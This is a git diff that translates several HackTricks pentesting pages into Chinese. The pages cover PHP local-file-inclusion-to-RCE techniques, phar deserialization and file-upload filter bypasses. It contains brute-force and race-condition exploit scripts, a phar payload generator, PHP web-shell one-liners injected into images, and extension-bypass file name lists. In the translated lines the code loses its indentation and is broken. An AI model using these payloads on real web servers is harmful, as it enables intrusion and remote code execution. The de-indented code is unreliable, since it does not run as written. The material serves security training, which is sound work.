+你还需要更改**payload**在利用的开始部分（例如，php-rev-shell），**REQ1**（这应该指向phpinfo页面并包含填充，即：_REQ1="""POST /install.php?mode=phpinfo\&a="""+padding+""" HTTP/1.1_），以及**LFIREQ**（这应该指向LFI漏洞，即：_LFIREQ="""GET /info?page=%s%%00 HTTP/1.1\r --_ 检查在利用空字符时的双“%”）
 
 {% file src="../../images/LFI-With-PHPInfo-Assistance.pdf" %}
 
-### Theory
+### 理论
 
-If uploads are allowed in PHP and you try to upload a file, this files is stored in a temporal directory until the server has finished processing the request, then this temporary files is deleted.
+如果在PHP中允许上传文件，并且你尝试上传一个文件，这个文件会存储在一个临时目录中，直到服务器处理完请求，然后这个临时文件会被删除。
 
-Then, if have found a LFI vulnerability in the web server you can try to guess the name of the temporary file created and exploit a RCE accessing the temporary file before it is deleted.
+然后，如果你在web服务器中发现了LFI漏洞，你可以尝试猜测创建的临时文件的名称，并通过在文件被删除之前访问临时文件来利用RCE。
 
-In **Windows** the files are usually stored in **C:\Windows\temp\php**
+在**Windows**中，文件通常存储在**C:\Windows\temp\php**
 
-In **linux** the name of the file use to be **random** and located in **/tmp**. As the name is random, it is needed to **extract from somewhere the name of the temporal file** and access it before it is deleted. This can be done reading the value of the **variable $\_FILES** inside the content of the function "**phpconfig()**".
+在**linux**中，文件的名称通常是**随机的**，位于**/tmp**。由于名称是随机的，需要**从某处提取临时文件的名称**并在文件被删除之前访问它。这可以通过读取函数“**phpconfig()**”内部的**变量$\_FILES**的值来完成。
 
 **phpinfo()**
 
-**PHP** uses a buffer of **4096B** and when it is **full**, it is **send to the client**. Then the client can **send** **a lot of big requests** (using big headers) **uploading a php** reverse **shell**, wait for the **first part of the phpinfo() to be returned** (where the name of the temporary file is) and try to **access the temp file** before the php server deletes the file exploiting a LFI vulnerability.
-
-**Python script to try to bruteforce the name (if length = 6)**
+**PHP**使用**4096B**的缓冲区，当它**满**时，它会被**发送到客户端**。然后客户端可以**发送****大量的大请求**（使用大头部）**上传一个php**反向**shell**，等待**phpinfo()的第一部分返回**（其中包含临时文件的名称），并尝试在php服务器删除文件之前访问临时文件，利用LFI漏洞。
 
+**Python脚本尝试暴力破解名称（如果长度=6）**
 ```python
 import itertools
 import requests
@@ -48,27 +45,25 @@ import sys
 print('[+] Trying to win the race')
 f = {'file': open('shell.php', 'rb')}
 for _ in range(4096 * 4096):
-    requests.post('http://target.com/index.php?c=index.php', f)
+requests.post('http://target.com/index.php?c=index.php', f)
 
 
 print('[+] Bruteforcing the inclusion')
 for fname in itertools.combinations(string.ascii_letters + string.digits, 6):
-    url = 'http://target.com/index.php?c=/tmp/php' + fname
-    r = requests.get(url)
-    if 'load average' in r.text:  # <?php echo system('uptime');
-        print('[+] We have got a shell: ' + url)
-        sys.exit(0)
+url = 'http://target.com/index.php?c=/tmp/php' + fname
+r = requests.get(url)
+if 'load average' in r.text:  # <?php echo system('uptime');
+print('[+] We have got a shell: ' + url)
+sys.exit(0)
 
 print('[x] Something went wrong, please try again')
 ```
-
 <figure><img src="/images/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
 
-**Get a hacker's perspective on your web apps, network, and cloud**
+**从黑客的角度看待您的网络应用、网络和云**
 
-**Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports.
+**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面，查找允许您提升权限的安全问题，并使用自动化漏洞利用收集重要证据，将您的辛勤工作转化为有说服力的报告。
 
 {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.md b/src/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.md
index 27d277345..1cca5dbeb 100644
--- a/src/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.md
+++ b/src/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.md
@@ -1,9 +1,8 @@
-# LFI2RCE via Segmentation Fault
+# LFI2RCE 通过分段错误
 
 {{#include ../../banners/hacktricks-training.md}}
 
-According to the writeups [https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/](https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/) (second part) and [https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view](https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view), the following payloads caused a segmentation fault in PHP:
-
+根据以下写作 [https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/](https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/)（第二部分）和 [https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view](https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view），以下有效载荷导致 PHP 中出现分段错误：
 ```php
 // PHP 7.0
 include("php://filter/string.strip_tags/resource=/etc/passwd");
@@ -11,13 +10,11 @@ include("php://filter/string.strip_tags/resource=/etc/passwd");
 // PHP 7.2
 include("php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff%ff%ff%ff%ffAAAAAAAAAAAAAAAAAAAAAAAA");
 ```
+您应该知道，如果您**发送**一个**POST**请求**包含**一个**文件**，PHP将会在`/tmp/php<something>`中创建一个**临时文件**，其内容为该文件的内容。该文件将在请求处理完毕后**自动删除**。
 
-You should know that if you **send** a **POST** request **containing** a **file**, PHP will create a **temporary file in `/tmp/php<something>`** with the contents of that file. This file will be **automatically deleted** once the request was processed.
-
-If you find a **LFI** and you manage to **trigger** a segmentation fault in PHP, the **temporary file will never be deleted**. Therefore, you can **search** for it with the **LFI** vulnerability until you find it and execute arbitrary code.
-
-You can use the docker image [https://hub.docker.com/r/easyengine/php7.0](https://hub.docker.com/r/easyengine/php7.0) for testing.
+如果您发现了**LFI**并且成功**触发**了PHP中的段错误，**临时文件将永远不会被删除**。因此，您可以利用**LFI**漏洞**搜索**该文件，直到找到它并执行任意代码。
 
+您可以使用docker镜像[https://hub.docker.com/r/easyengine/php7.0](https://hub.docker.com/r/easyengine/php7.0)进行测试。
 ```python
 # upload file with segmentation fault
 import requests
@@ -39,27 +36,25 @@ base_url = "http://%s:%d" % (host, port)
 
 
 def bruteforce(charset):
-    for i in charset:
-        for j in charset:
-            for k in charset:
-                for l in charset:
-                    for m in charset:
-                        for n in charset:
-                            filename = prefix + i + j + k
-                            url = "%s/index.php?i=/tmp/php%s" % (base_url, filename)
-                            print url
-                            response = requests.get(url)
-                            if 'spyd3r' in response.content:
-                                print "[+] Include success!"
-                                return True
+for i in charset:
+for j in charset:
+for k in charset:
+for l in charset:
+for m in charset:
+for n in charset:
+filename = prefix + i + j + k
+url = "%s/index.php?i=/tmp/php%s" % (base_url, filename)
+print url
+response = requests.get(url)
+if 'spyd3r' in response.content:
+print "[+] Include success!"
+return True
 
 
 def main():
-    bruteforce(charset)
+bruteforce(charset)
 
 if __name__ == "__main__":
-    main()
+main()
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/file-inclusion/lfi2rce-via-temp-file-uploads.md b/src/pentesting-web/file-inclusion/lfi2rce-via-temp-file-uploads.md
index 892ce4bf6..9555ed069 100644
--- a/src/pentesting-web/file-inclusion/lfi2rce-via-temp-file-uploads.md
+++ b/src/pentesting-web/file-inclusion/lfi2rce-via-temp-file-uploads.md
@@ -1,35 +1,32 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-**Check the full details of this technique in [https://gynvael.coldwind.pl/download.php?f=PHP_LFI_rfc1867_temporary_files.pdf](https://gynvael.coldwind.pl/download.php?f=PHP_LFI_rfc1867_temporary_files.pdf)**
+**查看此技术的完整细节 [https://gynvael.coldwind.pl/download.php?f=PHP_LFI_rfc1867_temporary_files.pdf](https://gynvael.coldwind.pl/download.php?f=PHP_LFI_rfc1867_temporary_files.pdf)**
 
-## **PHP File uploads**
+## **PHP 文件上传**
 
-When a **PHP** engine receives a **POST request** containing files formatted according to RFC 1867, it generates temporary files to store the uploaded data. These files are crucial for file upload handling in PHP scripts. The `move_uploaded_file` function must be used to relocate these temporary files to a desired location if persistent storage beyond the script's execution is needed. Post-execution, PHP automatically deletes any remaining temporary files.
+当 **PHP** 引擎接收到包含根据 RFC 1867 格式化的文件的 **POST 请求** 时，它会生成临时文件以存储上传的数据。这些文件对于 PHP 脚本中的文件上传处理至关重要。如果需要在脚本执行之外的持久存储，必须使用 `move_uploaded_file` 函数将这些临时文件移动到所需位置。执行后，PHP 会自动删除任何剩余的临时文件。
 
 > [!NOTE]
-> **Security Alert: Attackers, aware of the temporary files' location, might exploit a Local File Inclusion vulnerability to execute code by accessing the file during upload.**
+> **安全警报：攻击者如果知道临时文件的位置，可能会利用本地文件包含漏洞通过在上传过程中访问该文件来执行代码。**
 
-The challenge for unauthorized access lies in predicting the temporary file's name, which is intentionally randomized.
+未经授权访问的挑战在于预测临时文件的名称，该名称是故意随机化的。
 
-#### Exploitation on Windows Systems
+#### 在 Windows 系统上的利用
 
-On Windows, PHP generates temporary file names using the `GetTempFileName` function, resulting in a pattern like `<path>\<pre><uuuu>.TMP`. Notably:
+在 Windows 上，PHP 使用 `GetTempFileName` 函数生成临时文件名，形成类似 `<path>\<pre><uuuu>.TMP` 的模式。值得注意的是：
 
-- The default path is typically `C:\Windows\Temp`.
-- The prefix is usually "php".
-- The `<uuuu>` represents a unique hexadecimal value. Crucially, due to the function's limitation, only the lower 16 bits are used, allowing for a maximum of 65,535 unique names with constant path and prefix, making brute force feasible.
-
-Moreover, the exploitation process is simplified on Windows systems. A peculiarity in the `FindFirstFile` function permits the use of wildcards in Local File Inclusion (LFI) paths. This enables crafting an include path like the following to locate the temporary file:
+- 默认路径通常是 `C:\Windows\Temp`。
+- 前缀通常是 "php"。
+- `<uuuu>` 代表一个唯一的十六进制值。由于该函数的限制，仅使用低 16 位，因此最多可以生成 65,535 个具有固定路径和前缀的唯一名称，使暴力破解成为可能。
 
+此外，在 Windows 系统上，利用过程更为简化。`FindFirstFile` 函数中的一个特性允许在本地文件包含 (LFI) 路径中使用通配符。这使得可以构造如下的包含路径以定位临时文件：
 ```
 http://site/vuln.php?inc=c:\windows\temp\php<<
 ```
+在某些情况下，可能需要更具体的掩码（如 `php1<<` 或 `phpA<<`）。可以系统地尝试这些掩码以发现上传的临时文件。
 
-In certain situations, a more specific mask (like `php1<<` or `phpA<<`) might be required. One can systematically try these masks to discover the uploaded temporary file.
+#### 在GNU/Linux系统上的利用
 
-#### Exploitation on GNU/Linux Systems
-
-For GNU/Linux systems, the randomness in temporary file naming is robust, rendering the names neither predictable nor susceptible to brute force attacks. Further details can be found in the referenced documentation.
+对于GNU/Linux系统，临时文件命名中的随机性是强健的，使得名称既不可预测也不易受到暴力攻击。更多细节可以在参考文档中找到。
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/file-inclusion/phar-deserialization.md b/src/pentesting-web/file-inclusion/phar-deserialization.md
index 1e3d5a30e..bdce1c614 100644
--- a/src/pentesting-web/file-inclusion/phar-deserialization.md
+++ b/src/pentesting-web/file-inclusion/phar-deserialization.md
@@ -1,49 +1,46 @@
-# phar:// deserialization
+# phar:// 反序列化
 
 {{#include ../../banners/hacktricks-training.md}}
 
 <figure><img src="../../images/i3.png" alt=""><figcaption></figcaption></figure>
 
-**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
+**漏洞赏金提示**：**注册** **Intigriti**，一个由黑客为黑客创建的高级**漏洞赏金平台**！今天就加入我们，访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks)，开始赚取高达 **$100,000** 的赏金！
 
 {% embed url="https://go.intigriti.com/hacktricks" %}
 
-**Phar** files (PHP Archive) files **contain meta data in serialized format**, so, when parsed, this **metadata** is **deserialized** and you can try to abuse a **deserialization** vulnerability inside the **PHP** code.
+**Phar** 文件（PHP Archive）文件 **包含序列化格式的元数据**，因此，当解析时，这个 **元数据** 会被 **反序列化**，你可以尝试利用 **反序列化** 漏洞在 **PHP** 代码中。
 
-The best thing about this characteristic is that this deserialization will occur even using PHP functions that do not eval PHP code like **file_get_contents(), fopen(), file() or file_exists(), md5_file(), filemtime() or filesize()**.
-
-So, imagine a situation where you can make a PHP web get the size of an arbitrary file an arbitrary file using the **`phar://`** protocol, and inside the code you find a **class** similar to the following one:
+这个特性的最佳之处在于，即使使用不执行 PHP 代码的 PHP 函数，如 **file_get_contents()、fopen()、file() 或 file_exists()、md5_file()、filemtime() 或 filesize()**，也会发生这种反序列化。
 
+所以，想象一个情况，你可以让一个 PHP 网站使用 **`phar://`** 协议获取任意文件的大小，并且在代码中你发现一个类似于以下的 **类**：
 ```php:vunl.php
 <?php
 class AnyClass {
-	public $data = null;
-	public function __construct($data) {
-		$this->data = $data;
-	}
+public $data = null;
+public function __construct($data) {
+$this->data = $data;
+}
 
-	function __destruct() {
-		system($this->data);
-	}
+function __destruct() {
+system($this->data);
+}
 }
 
 filesize("phar://test.phar"); #The attacker can control this path
 ```
-
-You can create a **phar** file that when loaded will **abuse this class to execute arbitrary command**s with something like:
-
+您可以创建一个 **phar** 文件，当加载时将 **滥用此类以执行任意命令**，例如：
 ```php:create_phar.php
 <?php
 
 class AnyClass {
-	public $data = null;
-	public function __construct($data) {
-		$this->data = $data;
-	}
+public $data = null;
+public function __construct($data) {
+$this->data = $data;
+}
 
-	function __destruct() {
-		system($this->data);
-	}
+function __destruct() {
+system($this->data);
+}
 }
 
 // create new Phar
@@ -57,29 +54,23 @@ $object = new AnyClass('whoami');
 $phar->setMetadata($object);
 $phar->stopBuffering();
 ```
-
-Note how the **magic bytes of JPG** (`\xff\xd8\xff`) are added at the beginning of the phar file to **bypass** **possible** file **uploads** **restrictions**.\
-**Compile** the `test.phar` file with:
-
+注意 **JPG 的魔术字节** (`\xff\xd8\xff`) 是如何在 phar 文件的开头添加的，以 **绕过** **可能的** 文件 **上传** **限制**。\
+**编译** `test.phar` 文件：
 ```bash
 php --define phar.readonly=0 create_phar.php
 ```
-
-And execute the `whoami` command abusing the vulnerable code with:
-
+并执行 `whoami` 命令，利用易受攻击的代码：
 ```bash
 php vuln.php
 ```
-
-### References
+### 参考文献
 
 {% embed url="https://blog.ripstech.com/2018/new-php-exploitation-technique/" %}
 
 <figure><img src="../../images/i3.png" alt=""><figcaption></figcaption></figure>
 
-**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
+**漏洞赏金提示**：**注册** **Intigriti**，一个由黑客为黑客创建的高级**漏洞赏金平台**！今天就加入我们，访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks)，开始赚取高达 **$100,000** 的赏金！
 
 {% embed url="https://go.intigriti.com/hacktricks" %}
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/file-inclusion/via-php_session_upload_progress.md b/src/pentesting-web/file-inclusion/via-php_session_upload_progress.md
index 1fa5abf50..43175d60c 100644
--- a/src/pentesting-web/file-inclusion/via-php_session_upload_progress.md
+++ b/src/pentesting-web/file-inclusion/via-php_session_upload_progress.md
@@ -2,10 +2,9 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Info
-
-If you found a **Local File Inclusion** even if you **don't have a session** and `session.auto_start` is `Off`. If **`session.upload_progress.enabled`** is **`On`** and you provide the **`PHP_SESSION_UPLOAD_PROGRESS`** in **multipart POST** data, PHP will **enable the session for you**.
+## 基本信息
 
+如果你发现了一个 **Local File Inclusion**，即使你 **没有会话** 且 `session.auto_start` 为 `Off`。如果 **`session.upload_progress.enabled`** 为 **`On`** 并且你在 **multipart POST** 数据中提供 **`PHP_SESSION_UPLOAD_PROGRESS`**，PHP 将 **为你启用会话**。
 ```bash
 $ curl http://127.0.0.1/ -H 'Cookie: PHPSESSID=iamorange'
 $ ls -a /var/lib/php/sessions/
@@ -19,22 +18,20 @@ $ ls -a /var/lib/php/sessions/
 
 In the last example the session will contain the string blahblahblah
 ```
-
-Note that with **`PHP_SESSION_UPLOAD_PROGRESS`** you can **control data inside the session**, so if you includes your session file you can include a part you control (a php shellcode for example).
+注意，使用 **`PHP_SESSION_UPLOAD_PROGRESS`** 你可以 **控制会话中的数据**，因此如果你包含了你的会话文件，你可以包含一个你控制的部分（例如一个 php shellcode）。
 
 > [!NOTE]
-> Although most tutorials on the Internet recommends you to set `session.upload_progress.cleanup` to `Off` for debugging purpose. The default `session.upload_progress.cleanup` in PHP is still `On`. It means your upload progress in the session will be cleaned as soon as possible. So this will be **Race Condition**.
+> 尽管互联网上的大多数教程建议你将 `session.upload_progress.cleanup` 设置为 `Off` 以便于调试，但 PHP 中默认的 `session.upload_progress.cleanup` 仍然是 `On`。这意味着你的上传进度将在会话中尽快被清除。因此这将是 **竞争条件**。
 
-### The CTF
+### CTF
 
-In the [**original CTF**](https://blog.orange.tw/2018/10/) where this technique is commented, it wasn't enough to exploit the Race Condition but the content loaded needed to start also with the string `@<?php`.
+在 [**原始 CTF**](https://blog.orange.tw/2018/10/) 中，评论了这种技术，利用竞争条件并不足够，加载的内容也需要以字符串 `@<?php` 开头。
 
-Due to the default setting of `session.upload_progress.prefix`, our **SESSION file will start with a annoying prefix** `upload_progress_` Such as: `upload_progress_controlledcontentbyattacker`
+由于 `session.upload_progress.prefix` 的默认设置，我们的 **SESSION 文件将以一个烦人的前缀** `upload_progress_` 开头，例如：`upload_progress_controlledcontentbyattacker`
 
-The trick to **remove the initial prefix** was to **base64encode the payload 3 times** and then decode it via `convert.base64-decode` filters, this is because when **base64 decoding PHP will remove the weird characters**, so after 3 times **only** the **payload** **sent** by the attacker will **remain** (and then the attacker can control the initial part).
+**去除初始前缀** 的技巧是 **将有效载荷进行 3 次 base64 编码**，然后通过 `convert.base64-decode` 过滤器解码，这是因为在 **base64 解码时 PHP 会去除奇怪的字符**，因此经过 3 次后 **仅** 会 **保留** 攻击者 **发送的有效载荷**（然后攻击者可以控制初始部分）。
 
-More information in the original writeup [https://blog.orange.tw/2018/10/](https://blog.orange.tw/2018/10/) and final exploit [https://github.com/orangetw/My-CTF-Web-Challenges/blob/master/hitcon-ctf-2018/one-line-php-challenge/exp_for_php.py](https://github.com/orangetw/My-CTF-Web-Challenges/blob/master/hitcon-ctf-2018/one-line-php-challenge/exp_for_php.py)\
-Another writeup in [https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/](https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/)
+更多信息请参见原始写作 [https://blog.orange.tw/2018/10/](https://blog.orange.tw/2018/10/) 和最终利用 [https://github.com/orangetw/My-CTF-Web-Challenges/blob/master/hitcon-ctf-2018/one-line-php-challenge/exp_for_php.py](https://github.com/orangetw/My-CTF-Web-Challenges/blob/master/hitcon-ctf-2018/one-line-php-challenge/exp_for_php.py)\
+另一个写作在 [https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/](https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/file-upload/README.md b/src/pentesting-web/file-upload/README.md
index ddb1b831a..d75588569 100644
--- a/src/pentesting-web/file-upload/README.md
+++ b/src/pentesting-web/file-upload/README.md
@@ -1,19 +1,19 @@
-# File Upload
+# 文件上传
 
 {{#include ../../banners/hacktricks-training.md}}
 
 <figure><img src="../../images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
+如果你对**黑客职业**感兴趣并想要攻克不可攻克的目标 - **我们正在招聘！**（_需要流利的波兰语书写和口语能力_）。
 
 {% embed url="https://www.stmcyber.com/careers" %}
 
-## File Upload General Methodology
+## 文件上传一般方法论
 
-Other useful extensions:
+其他有用的扩展名：
 
 - **PHP**: _.php_, _.php2_, _.php3_, ._php4_, ._php5_, ._php6_, ._php7_, .phps, ._pht_, ._phtm, .phtml_, ._pgif_, _.shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module_
-  - **Working in PHPv8**: _.php_, _.php4_, _.php5_, _.phtml_, _.module_, _.inc_, _.hphp_, _.ctp_
+- **在PHPv8中工作**: _.php_, _.php4_, _.php5_, _.phtml_, _.module_, _.inc_, _.hphp_, _.ctp_
 - **ASP**: _.asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml_
 - **Jsp:** _.jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action_
 - **Coldfusion:** _.cfm, .cfml, .cfc, .dbm_
@@ -21,101 +21,100 @@ Other useful extensions:
 - **Perl**: _.pl, .cgi_
 - **Erlang Yaws Web Server**: _.yaws_
 
-### Bypass file extensions checks
+### 绕过文件扩展名检查
 
-1. If they apply, the **check** the **previous extensions.** Also test them using some **uppercase letters**: _pHp, .pHP5, .PhAr ..._
-2. _Check **adding a valid extension before** the execution extension (use previous extensions also):_
-   - _file.png.php_
-   - _file.png.Php5_
-3. Try adding **special characters at the end.** You could use Burp to **bruteforce** all the **ascii** and **Unicode** characters. (_Note that you can also try to use the **previously** motioned **extensions**_)
-   - _file.php%20_
-   - _file.php%0a_
-   - _file.php%00_
-   - _file.php%0d%0a_
-   - _file.php/_
-   - _file.php.\\_
-   - _file._
-   - _file.php...._
-   - _file.pHp5...._
-4. Try to bypass the protections **tricking the extension parser** of the server-side with techniques like **doubling** the **extension** or **adding junk** data (**null** bytes) between extensions. _You can also use the **previous extensions** to prepare a better payload._
-   - _file.png.php_
-   - _file.png.pHp5_
-   - _file.php#.png_
-   - _file.php%00.png_
-   - _file.php\x00.png_
-   - _file.php%0a.png_
-   - _file.php%0d%0a.png_
-   - _file.phpJunk123png_
-5. Add **another layer of extensions** to the previous check:
-   - _file.png.jpg.php_
-   - _file.php%00.png%00.jpg_
-6. Try to put the **exec extension before the valid extension** and pray so the server is misconfigured. (useful to exploit Apache misconfigurations where anything with extension\*\* _**.php**_**, but** not necessarily ending in .php\*\* will execute code):
-   - _ex: file.php.png_
-7. Using **NTFS alternate data stream (ADS)** in **Windows**. In this case, a colon character “:” will be inserted after a forbidden extension and before a permitted one. As a result, an **empty file with the forbidden extension** will be created on the server (e.g. “file.asax:.jpg”). This file might be edited later using other techniques such as using its short filename. The “**::$data**” pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions (.e.g. “file.asp::$data.”)
-8. Try to break the filename limits. The valid extension gets cut off. And the malicious PHP gets left. AAA<--SNIP-->AAA.php
+1. 如果适用，**检查** **之前的扩展名**。也可以使用一些**大写字母**进行测试：_pHp, .pHP5, .PhAr ..._
+2. _检查**在执行扩展名之前添加有效扩展名**（也使用之前的扩展名）：_
+- _file.png.php_
+- _file.png.Php5_
+3. 尝试在末尾添加**特殊字符**。你可以使用Burp来**暴力破解**所有的**ascii**和**Unicode**字符。 （_注意你也可以尝试使用**之前**提到的**扩展名**_）
+- _file.php%20_
+- _file.php%0a_
+- _file.php%00_
+- _file.php%0d%0a_
+- _file.php/_
+- _file.php.\\_
+- _file._
+- _file.php...._
+- _file.pHp5...._
+4. 尝试通过**欺骗服务器端的扩展解析器**来绕过保护，使用**双重**扩展名或在扩展名之间**添加垃圾**数据（**null**字节）。_你也可以使用**之前的扩展名**来准备更好的有效载荷。_
+- _file.png.php_
+- _file.png.pHp5_
+- _file.php#.png_
+- _file.php%00.png_
+- _file.php\x00.png_
+- _file.php%0a.png_
+- _file.php%0d%0a.png_
+- _file.phpJunk123png_
+5. 为之前的检查添加**另一层扩展名**：
+- _file.png.jpg.php_
+- _file.php%00.png%00.jpg_
+6. 尝试将**exec扩展名放在有效扩展名之前**，并祈祷服务器配置错误。（有助于利用Apache配置错误，其中任何带有扩展名**_**.php**_**的内容，但不一定以.php结尾**将执行代码）：
+- _例如：file.php.png_
+7. 在**Windows**中使用**NTFS备用数据流（ADS）**。在这种情况下，冒号字符“:”将插入在禁止扩展名之后和允许扩展名之前。因此，将在服务器上创建一个**带有禁止扩展名的空文件**（例如“file.asax:.jpg”）。该文件可以稍后使用其他技术进行编辑，例如使用其短文件名。“**::$data**”模式也可以用于创建非空文件。因此，在此模式后添加一个点字符也可能有助于绕过进一步的限制（例如“file.asp::$data.”）
+8. 尝试打破文件名限制。有效扩展名被截断，恶意PHP被保留。AAA<--SNIP-->AAA.php
 
-   ```
-   # Linux maximum 255 bytes
-   /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 255
-   Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4 # minus 4 here and adding .png
-   # Upload the file and check response how many characters it alllows. Let's say 236
-   python -c 'print "A" * 232'
-   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-   # Make the payload
-   AAA<--SNIP 232 A-->AAA.php.png
-   ```
+```
+# Linux最大255字节
+/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 255
+Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4 # 在这里减去4并添加.png
+# 上传文件并检查响应允许多少个字符。假设236
+python -c 'print "A" * 232'
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+# 制作有效载荷
+AAA<--SNIP 232 A-->AAA.php.png
+```
 
-### Bypass Content-Type, Magic Number, Compression & Resizing
+### 绕过内容类型、魔术数字、压缩和调整大小
 
-- Bypass **Content-Type** checks by setting the **value** of the **Content-Type** **header** to: _image/png_ , _text/plain , application/octet-stream_
-  1. Content-Type **wordlist**: [https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt)
-- Bypass **magic number** check by adding at the beginning of the file the **bytes of a real image** (confuse the _file_ command). Or introduce the shell inside the **metadata**:\
-  `exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg`\
-  `\` or you could also **introduce the payload directly** in an image:\
-  `echo '<?php system($_REQUEST['cmd']); ?>' >> img.png`
-- If **compressions is being added to your image**, for example using some standard PHP libraries like [PHP-GD](https://www.php.net/manual/fr/book.image.php), the previous techniques won't be useful it. However, you could use the **PLTE chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) to insert some text that will **survive compression**.
-  - [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_plte_png.php)
-- The web page cold also be **resizing** the **image**, using for example the PHP-GD functions `imagecopyresized` or `imagecopyresampled`. However, you could use the **IDAT chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) to insert some text that will **survive compression**.
-  - [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_idat_png.php)
